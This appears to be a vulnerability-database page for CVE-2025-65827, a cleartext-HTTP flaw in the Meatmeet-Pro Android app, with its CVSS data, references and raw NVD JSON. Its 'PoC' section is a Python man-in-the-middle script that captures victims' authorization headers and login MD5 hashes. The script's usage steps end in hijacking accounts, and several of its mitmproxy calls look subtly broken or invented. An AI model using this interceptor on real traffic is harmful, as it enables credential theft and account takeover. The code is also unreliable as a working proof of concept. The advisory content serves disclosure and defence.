CVE-2025-65827

Description

The mobile application is configured to allow clear text traffic to all domains and communicates with an API server over HTTP. As a result, an adversary located "upstream" can intercept the traffic, inspect its contents, and modify the requests in transit. TThis may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:meatmeet:meatmeet:1.1.2.0:*:*:*:pro:android:*:* - VULNERABLE

Meatmeet-Pro 移动应用（所有启用明文传输的版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-65827 PoC - Clear Text Traffic Interception
This PoC demonstrates how an attacker can intercept clear text HTTP traffic
from a vulnerable mobile application.
"""

import mitmproxy
from mitmproxy import http, options
from mitmproxy.proxy import proxyconfig
import json

class CVE202565827Interceptor:
    def __init__(self):
        self.intercepted_requests = []
    
    def request(self, flow: http.HTTPFlow):
        """Intercept HTTP requests from the vulnerable mobile app"""
        # Check if the request is over HTTP (not HTTPS)
        if flow.request.scheme == 'http':
            print(f"[*] Intercepted HTTP Request: {flow.request.url}")
            print(f"[*] Method: {flow.request.method}")
            print(f"[*] Headers: {dict(flow.request.headers)}")
            
            # Extract authentication tokens or MD5 hashes
            if 'Authorization' in flow.request.headers:
                auth_header = flow.request.headers['Authorization']
                print(f"[!] Found Authorization Header: {auth_header}")
                self.intercepted_requests.append({
                    'url': flow.request.url,
                    'auth': auth_header
                })
            
            # Log request body (may contain MD5 hash)
            if flow.request.content:
                print(f"[*] Request Body: {flow.request.content.decode('utf-8', errors='ignore')}")
    
    def response(self, flow: http.HTTPFlow):
        """Log intercepted responses"""
        if flow.response and flow.response.content:
            print(f"[*] Response from server: {flow.response.content[:200]}")

def run_proxy():
    """Run MITM proxy to intercept clear text traffic"""
    opts = options.Options(listen_host='0.0.0.0', listen_port=8080)
    config = proxyconfig.ProxyConfig(
        mode=proxyconfig.Modes.REVERSE_PROXY,
        upstream_server=proxyconfig.UpstreamServerConfig(
            'http://target-api-server.com'
        )
    )
    
    master = mitmproxy.http.HTTPMaster(opts)
    master.addons.add(CVE202565827Interceptor())
    
    print("[*] Starting MITM Proxy on port 8080...")
    print("[*] Configure mobile device to use this proxy")
    master.run()

# Usage:
# 1. Set up this proxy on the attacker's machine
# 2. Configure victim's mobile device to route traffic through this proxy
# 3. Intercept and analyze HTTP traffic
# 4. Extract authentication tokens or MD5 hashes
# 5. Use extracted credentials to hijack user accounts

if __name__ == '__main__':
    run_proxy()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65827
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65827
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65827/
[4] VulDB https://vuldb.com/cve/CVE-2025-65827
[5] https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-clear-text-traffic-enabled-md
[6] https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Clear-Text-Traffic-Enabled.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65827", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:08.473", "lastModified": "2025-12-30T19:09:32.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mobile application is configured to allow clear text traffic to all domains and communicates with an API server over HTTP. As a result, an adversary located \"upstream\" can intercept the traffic, inspect its contents, and modify the requests in transit. TThis may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meatmeet:meatmeet:1.1.2.0:*:*:*:pro:android:*:*", "matchCriteriaId": "5728B254-9D91-4EA1-9C7B-B4957DE1D77D"}]}]}], "references": [{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-clear-text-traffic-enabled-md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Clear-Text-Traffic-Enabled.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}